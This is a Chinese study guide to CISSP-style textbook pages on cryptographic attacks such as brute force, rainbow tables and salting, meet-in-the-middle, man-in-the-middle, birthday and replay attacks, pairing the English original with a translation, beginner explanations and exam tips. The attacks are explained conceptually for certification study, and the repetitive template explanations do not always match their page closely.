虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 46 / PDF P472

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Cryptographic Attacks As with any security mechanism, malicious individuals have found a number of attacks to defeat cryptosystems. It's important that you understand the threats posed by various cryptographic attacks to minimize the risks posed to your systems: Brute-Force Attack Brute-force attacks are quite straightforward. Such an attack attempts every possible valid combination for a key or password. They involve using massive amounts of processing power to methodically guess the key used to secure cryptographic communications. Analytic Attack This is an algebraic manipulation that attempts to reduce the complexity of the algorithm.

Analytic attacks focus on the logic of the algorithm itself. Implementation Attack This is a type of attack that exploits weaknesses in the implementation of a cryptography system. It focuses on exploiting the hardware or the software code, not just errors and flaws but the methodology employed to program the encryption system. Statistical Attack A statistical attack exploits statistical weaknesses in a cryptosystem, such as the inability to produce truly random numbers. Statistical attacks may be attempted against a database. Also, a vulnerability in the hardware or operating system hosting the cryptography application may be exploited.

Fault Injection Attack In these attacks, the attacker attempts to compromise the integrity of a cryptographic device by causing some type of external fault. For example, they might use high-voltage electricity, high or low temperature, or other factors to cause a malfunction that undermines the security of the device. Side-Channel Attack Computer systems generate characteristic footprints of activity, such as changes in processor utilization, electricity consumption, or electromagnetic radiation. Side-channel attacks seek to use this information to monitor system activity and retrieve information that is actively being encrypted.

Timing Attack Timing attacks are an example of a side-channel attack where the attacker measures precisely how long cryptographic operations take to complete, gaining information about the cryptographic process that may be used to undermine its security.

中文直译 / 整理

密码学攻击 与任何安全机制一样,恶意人员已发现多种攻击手段来破解加密系统。 理解各 种密码攻击所带来的威胁对于降低对您系统的风险至关重要: 暴力破解攻击 暴力破解攻击非常直接。 此类攻击尝试密钥或密码的所有可能有效 组合,通过使用大量的计算能力,系统地猜测用于保护密码通信的密钥。 解析攻击 这是一种代数操作,旨在降低算法的复杂性。 解析攻击聚焦于算法本 身的逻辑。 实现攻击 这是一种利用密码系统实现中的弱点的攻击类型,重点在于利用硬件 或软件代码,不仅包括错误和缺陷,还包括用于编程加密系统的方法。 统计攻击 统计攻击利用密码系统中的统计弱点,例如无法生成真正随机的数字。 统计攻击可能针对数据库进行尝试,也可能利用托管密码应用的硬件或操作系 统的漏洞。 故障注入攻击 在这些攻击中,攻击者试图通过引发某种外部故障来破坏密码设备 的完整性。 例如,他们可能使用高电压、高温或低温或其他因素,导致设备故障, 从而削弱其安全性。 侧信道攻击 计算机系统会产生具有特征性的活动痕迹,例如处理器利用率变化、 电力消耗或电磁辐射。 侧信道攻击旨在利用这些信息监控系统活动,并获取正 在被加密的信息。

计时攻击 计时攻击是侧信道攻击的一个例子,攻击者精确测量加密操作完成 所需的时间,从而获取可能用于破坏其安全性的加密过程信息。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 47 / PDF P473

第 473 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

For a nonflawed protocol, the average amount of time required to discover the key through a brute-force attack is directly proportional to the length of the key. A brute-force attack will always be successful given enough time. Every additional bit of key length doubles the time to perform a brute-force attack because the number of potential keys doubles. There are two modifications that attackers can make to enhance the effectiveness of a brute-force attack: Rainbow tables provide precomputed values for cryptographic hashes. These are commonly used for cracking passwords stored on a system in hashed form.

Specialized, scalable computing hardware designed specifically for the conduct of brute-force attacks may greatly increase the efficiency of this approach.

中文直译 / 整理

对于一个无缺陷的协议,通过暴力攻击发现密钥所需的平均时间与密钥长度 成正比。 只要有足够的时间,暴力攻击总会成功。 密钥长度每增加一位,暴 力攻击所需的时间就会翻倍,因为潜在密钥的数量会翻倍。 攻击者可以进行两种修改以增强暴力破解攻击的有效性: 彩虹表提供了加密哈希的预计算值。 这些通常用于破解以哈希形式存储 在系统中的密码。 专为执行暴力攻击而设计的专用可扩展计算硬件可以大大提升这种方法的 效率。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 473 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 48 / PDF P474

第 474 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Salting Saves Passwords Salt might be hazardous to your health, but it can save your password. To help combat the use of brute-force attacks, including those aided by dictionaries and rainbow tables, cryptographers make use of a technology known as cryptographic salt. The cryptographic salt is a random value that is added to the end of the password before the operating system hashes the password. The salt is then stored in the password file along with the hash. When the operating system wishes to compare a user's proffered password to the password file, it first retrieves the salt and appends it to the password.

It feeds the concatenated value to the hash function and compares the resulting hash with the one stored in the password file. Specialized password hashing functions, such as PBKDF2 (PasswordBased Key Derivation Function 2), bcrypt, and scrypt, allow for the creation of hashes using salts and also incorporate a technique known as key stretching that makes it more computationally difficult to perform a single password guess. The use of salting, especially when combined with key stretching, dramatically increases the difficulty of brute-force attacks. Anyone attempting to build a rainbow table must build a separate table for each possible value of the cryptographic salt.

Frequency Analysis and the Ciphertext-Only Attack In many cases, the only information you have at your disposal is the encrypted ciphertext message, a scenario known as the ciphertext-only attack. In this case, one technique that proves helpful against simple ciphers is frequency analysis—counting the number of times each letter appears in the ciphertext. Using your knowledge that the letters E, T, A, O, I, N are the most common in the English language, you can then test several hypotheses: If these letters are also the most common in the ciphertext, the cipher was likely a transposition cipher, which rearranged the characters of the plaintext without altering them.

中文直译 / 整理

加盐保护密码 盐可能对您的健康有害,但它可以保护您的密码。 为了应对暴力攻击(包 括借助字典和彩虹表的攻击),密码学家使用一种称为密码盐的技术。 加密盐是一个随机值,在操作系统对密码进行哈希处理之前,将其添加到 密码的末尾。 然后,盐与哈希值一起存储在密码文件中。 当操作系统需要 将用户提供的密码与密码文件中的密码进行比较时,它首先检索盐,并将 其附加到密码上。 然后将连接后的值输入哈希函数,将生成的哈希值与密 码文件中存储的哈希值进行比较。 专用的密码哈希函数,例如 PBKDF2(基于密码的密钥派生函数 2)、 bcrypt 和 scrypt,允许使用盐生成哈希值,并且还结合了一种称为 密钥 扩展 的技术,使单次密码猜测的计算难度更大。 使用加盐,尤其是与密钥扩展结合使用时,可以显著增加暴力破解攻击 的难度。 任何试图构建彩虹表的人,都必须为每个可能的加密盐值单独 构建一个表。 频率分析与仅密文攻击在许多情况下,您唯一可用的信息是加密的密文消 息,这种情况被称为仅密文攻击。 在这种情况下,一种对简单密码有效的 技术是频率分析——统计密文中每个字母出现的次数。

利用您对英语中最 常见字母E、T、A、O、I、N的知识,您可以测试几种假设: 如果这些字母在密文中也是最常见的,那么该密码很可能是一种置换密 码,它重新排列了明文字符的顺序,但未改变这些字符本身。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 474 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 49 / PDF P475

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

If other letters are the most common in the ciphertext, the cipher is probably some form of substitution cipher that replaced the plaintext characters. This is a simple overview of frequency analysis, and many sophisticated variations on this technique can be used against polyalphabetic ciphers and other sophisticated cryptosystems. Known Plaintext Attack In the known plaintext attack, the attacker has a copy of the encrypted message along with the plaintext message used to generate the ciphertext (the copy). This knowledge greatly assists the attacker in breaking weaker codes.

For example, imagine the ease with which you could break the Caesar cipher described in Chapter 6 if you had both a plaintext copy and a ciphertext copy of the same message. Chosen Plaintext Attack In this attack, the attacker obtains the ciphertexts corresponding to a set of plaintexts of their own choosing. This allows the attacker to attempt to derive the key used and thus decrypt other messages encrypted with that key. This can be difficult, but it is not impossible. Advanced methods such as differential cryptanalysis are types of chosen plaintext attacks. Chosen Ciphertext Attack In a chosen ciphertext attack, the attacker has access to the algorithm.

They have the ability to decrypt chosen portions of the ciphertext message and use the decrypted portion of the message to discover the key. Meet-in-the-Middle Attack Attackers might use a meet-in-the-middle attack to defeat encryption algorithms that use two rounds of encryption. This attack is the reason that Double DES (2DES) was quickly discarded as a viable enhancement to the DES encryption (it was replaced by Triple DES, or 3DES). In the meet-in-the-middle attack, the attacker uses a known plaintext message. The plaintext is then encrypted using every possible key (k1), and the equivalent ciphertext is decrypted using all possible keys (k2).

When a match is found, the corresponding pair (k1, k2) represents both portions of the double encryption. This type of attack generally takes only double the time necessary to break a single round of encryption (or 2n rather than the anticipated 2n * 2n), offering minimal added protection.

中文直译 / 整理

如果密文中其他字母最常见,则该密码可能是某种替换密码,它替换 了明文字符。 这是对频率分析的简单概述,许多更复杂的变体技术可用于破解多字母密 码和其他复杂的加密系统。 已知明文攻击 在已知明文攻击中,攻击者拥有加密消息的副本以及用于生 成密文的明文消息(副本)。 这种知识极大地帮助攻击者破解较弱的密码。 例如,如果你同时拥有同一消息的明文副本和密文副本,你破解第第6章中 描述的凯撒密码将多么容易。 选择明文攻击 在这种攻击中,攻击者获取其自行选择的一组明文对应的密 文。 这使得攻击者能够尝试推导出所使用的密钥,从而解密用该密钥加密 的其他消息。 这可能很困难,但并非不可能。 高级方法如差分密码分析就 是一种选择明文攻击。 选择密文攻击 在选择密文攻击中,攻击者可以访问该算法。 他们能够解 密密文消息的选定部分,并利用解密出的消息部分来推断密钥。 中间相遇攻击 攻击者可能使用中间相遇攻击来破解使用两轮加密的加密算 法。 这种攻击是双DES(2DES)被迅速弃用作为DES加密的可行增强方案 的原因(它被三重DES,或3DES所取代)。 在中间相遇攻击中,攻击者使用一个已知的明文消息。

然后使用每个可能 的密钥(k1)对明文进行加密,并使用所有可能的密钥(k2)对相应的 密文进行解密。 当找到匹配时,对应的密钥对(k1, k2)即代表双重加密 的两个部分。 这种攻击通常仅需花费破解单轮加密所需时间的两倍(或 2n 而非预期的 2n * 2n),提供的额外保护极少。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 50 / PDF P476

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Man-in-the-Middle Attack In the man-in-the-middle (MITM) attack, a malicious individual sits between two communicating parties and intercepts all communications (including the setup of the cryptographic session). The attacker responds to the originator's initialization requests and sets up a secure session with the originator. The attacker then establishes a second secure session with the intended recipient using a different key and posing as the originator. The attacker can then “sit in the middle” of the communication and read all traffic as it passes between the two parties. Be careful not to confuse the meet-in-the-middle attack with the man-in-the-middle attack.

They may have similar names, but they are quite different. Birthday Attack The birthday attack, also known as a collision attack or reverse hash matching (see the discussion of brute-force and dictionary attacks in Chapter 14, “Controlling and Monitoring Access”), seeks to find flaws in the one-to-one nature of hashing functions. In this attack, the malicious individual seeks to replace the content of a digitally signed communication with a different message that produces the same message digest, thereby maintaining the validity of the original digital signature. Don't forget that social engineering techniques can also be used in cryptanalysis.

If you're able to obtain a decryption key by simply asking the sender for it, that's much easier than attempting to crack the cryptosystem. Replay Attack The replay attack is used against cryptographic algorithms that don't incorporate temporal protections. In this attack, the malicious individual intercepts an encrypted message between two parties (often a request for authentication) and then later “replays” the captured message to open a new session. This attack can be defeated by incorporating a timestamp and expiration period into each message, using a challenge-response mechanism, and encrypting authentication sessions with ephemeral session keys.

中文直译 / 整理

中间人攻击在中间人(MITM)攻击中,一个恶意个体位于两个通信方之 间,截获所有通信(包括加密会话的建立)。 攻击者响应发起方的初始化 请求,并与发起方建立安全会话。 然后,攻击者使用不同的密钥并冒充发 起方,与预期的接收方建立第二个安全会话。 此后,攻击者可以“位于通 信中间”,读取两方之间传输的所有流量。 请注意不要将中间相遇攻击与中间人攻击混淆。 它们的名字可 能相似,但差别很大。 生日攻击 生日攻击,也称为 碰撞攻击或 反向哈希匹配(参见第14章“控 制和监控访问”中关于暴力攻击和字典攻击的讨论),旨在发现哈希函数 一对一特性的缺陷。 在此攻击中,恶意人员试图用一个产生相同消息摘要 的不同消息替换数字签名通信的内容,从而保持原始数字签名的有效性。 不要忘记,社会工程学技术也可用于密码分析。 如果你只需向发 送方索要即可获得解密密钥,那远比尝试破解密码系统容易得多。 重放攻击 重放攻击针对的是未包含时间保护机制的加密算法。 在这种攻击 中,恶意人员截获两个实体之间的加密消息(通常是身份验证请求),然 后稍后“重放”捕获的消息以建立新的会话。

通过在每条消息中引入时间 戳和过期时间、使用挑战‑响应机制,并使用临时会话密钥加密身份验证会 话,可以防御这种攻击。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 51 / PDF P477

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Many other attacks make use of cryptographic techniques as well. For example, Chapter 14 describes the use of cryptographic techniques in pass-the-hash and Kerberos exploitation, and Chapter 21, “Malicious Code and Application Attacks,” describes the use of cryptography in ransomware attacks. Summary Asymmetric key cryptography, or public key encryption, provides an extremely flexible infrastructure, facilitating simple, secure communication between parties that do not necessarily know each other prior to initiating the communication. It also provides the framework for the digital signing of messages to ensure nonrepudiation and message integrity.

This chapter explored public key encryption, which provides a scalable cryptographic architecture for use by large numbers of users. We also described some popular cryptographic algorithms, and the use of link encryption and end-to-end encryption. We introduced you to the public key infrastructure, which uses certificate authorities (CAs) to generate digital certificates containing the public keys of system users and digital signatures, which rely on a combination of public key cryptography and hashing functions. You also learned how to use the PKI to obtain integrity and nonrepudiation through the use of digital signatures.

You learned how to ensure consistent security throughout the cryptographic life cycle by adopting key management practices and other mechanisms. We also looked at some of the common applications of cryptographic technology in solving everyday problems. You learned how cryptography can be used to secure email (using PGP and S/MIME), web communications (using TLS), and both peer-to-peer and gateway-to-gateway networking (using IPSec). Finally, we covered some of the more common attacks used by malicious individuals attempting to interfere with or intercept encrypted communications between two parties.

Such attacks include cryptanalytic, replay, brute-force, known plaintext, chosen plaintext, chosen ciphertext, on-

中文直译 / 整理

许多其他攻击也利用了加密技术。 例如,第14章描述了加密技术在传递 哈希和Kerberos利用中的应用,而第21章“恶意代码与应用攻击”描述了 加密技术在勒索软件攻击中的应用。 摘要 非对称密钥加密,或公钥加密,提供了一种极为灵活的基础设施,使得尚未相 互认识的各方在开始通信前也能实现简单、安全的通信。 它还为消息的数字签 名提供了框架,以确保不可否认性性和消息完整性。 本章探讨了公钥加密,它为大量用户提供了可扩展的加密架构。 我们还描述了 一些流行的加密算法,以及链路加密和端到端加密的使用。 我们向您介绍了公 钥基础设施(PKI),该系统使用证书颁发机构(CA)生成包含系统用户公钥 和数字签名的数字证书,数字签名依赖于公钥加密与哈希函数的结合。 您还学 习了如何通过数字签名利用PKI实现完整性和不可否认性性。 您了解了如何通过采 用密钥管理实践和其他机制,确保在整个加密生命周期中保持一致的安全性。 我们还研究了加密技术在解决日常问题中的某些常见应用。 您学习了如何使用 加密技术保护电子邮件(使用PGP和S/MIME)、网络通信(使用TLS),以 及点对点和网关到网关的网络(使用IPSec)。

最后,我们介绍了一些恶意人员试图干扰或截获双方加密通信时常用的攻击方 式。 此类攻击包括密码分析、重放、暴力破解、已知明文、选择明文、选择密 文、

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 52 / PDF P478

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

path, man-in-the-middle, and birthday attacks. It's important for you to understand these attacks in order to provide adequate security against them. Study Essentials Understand the key types used in asymmetric cryptography. Public keys are freely shared among communicating parties, whereas private keys are kept secret. To encrypt a message, use the recipient's public key. To decrypt a message, use your own private key. To sign a message, use your own private key. To validate a signature, use the sender's public key. Be familiar with the three major public key cryptosystems. RSA is the most famous public key cryptosystem; it was developed by Rivest, Shamir, and Adleman in 1977.

It depends on the difficulty of factoring the product of prime numbers. ElGamal is an extension of the Diffie–Hellman key exchange algorithm that depends on modular arithmetic. Elliptic curve cryptography depends on the elliptic curve discrete logarithm problem and provides more security than other algorithms when both are used with keys of the same length. Know the fundamental requirements of a hash function. Good hash functions have five requirements. They must allow input of any length, provide fixed-length output, make it relatively easy to compute the hash function for any input, provide one-way functionality, and be collisionresistant. Be familiar with the major hashing algorithms.

The Secure Hash Algorithm SHA-3 is the government standard message digest function. SHA-2 supports variable-length message digests, ranging up to 512 bits. SHA-3 improves upon the security of SHA-2 and supports the same hash lengths. Know how cryptographic salts improve the security of password hashing. When straightforward hashing is used to store passwords in a password file, attackers may use rainbow tables of precomputed values to identify commonly used passwords. Adding salts to the passwords before hashing them reduces the effectiveness of rainbow table attacks.

Common password hashing algorithms that use key stretching to further increase the difficulty of attack include PBKDF2, bcrypt, and scrypt. Understand how digital signatures are generated and verified. To digitally sign a message, first use a hashing function to generate a message digest; then encrypt the digest with your private key. To verify the digital

中文直译 / 整理

中间人和生日攻击。 您需要理解这些攻击,以便提供充分的防护措施。 学习必备 了解非对称加密中使用的关键类型。 公钥在通信各方之间自由共享,而私钥则需 保密。 要加密一条消息,请使用接收方的公钥; 要解密一条消息,请使用您自己 的私钥; 要对消息进行签名,请使用您自己的私钥; 要验证签名,请使用发送方 的公钥。 熟悉三大公钥加密系统。 RSA是最著名的公钥加密系统,由Rivest、Sha mir和Adleman于1977年开发,其安全性依赖于大素数乘积分解的困难性。 ElGamal是Diffie–Hellman密钥交换算法的扩展,依赖于模算术。 椭圆曲线 加密依赖于椭圆曲线离散对数问题,在相同密钥长度下,其安全性优于其他算 法。 了解哈希函数的基本要求。 良好的哈希函数需满足五个要求:必须允许任意长度 的输入,提供固定长度的输出,能够相对容易地计算任意输入的哈希值,具备单 向性,并具有抗碰撞性。 熟悉主要的哈希算法。 安全哈希算法 SHA‑3 是政府标准的消息摘要函数。 SHA‑2 支持可变长度的消息摘要,最长可达 512 位。 SHA‑3 在 SHA‑2 的安全性 基础上进行了改进,并支持相同的哈希长度。

了解加密盐如何提升密码哈希的安全性。 当直接使用哈希算法存储密码文件中 的密码时,攻击者可能使用预计算值的彩虹表来识别常用密码。 在哈希密码前 添加盐值可以降低彩虹表攻击的有效性。 常见的使用密钥扩展进一步增加攻击 难度的密码哈希算法包括 PBKDF2、bcrypt 和 scrypt。 了解数字签名的生成和验证过程。 要对消息进行数字签名,首先使用哈希函数 生成消息摘要; 然后使用您的私钥加密该摘要。 要验证数字

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
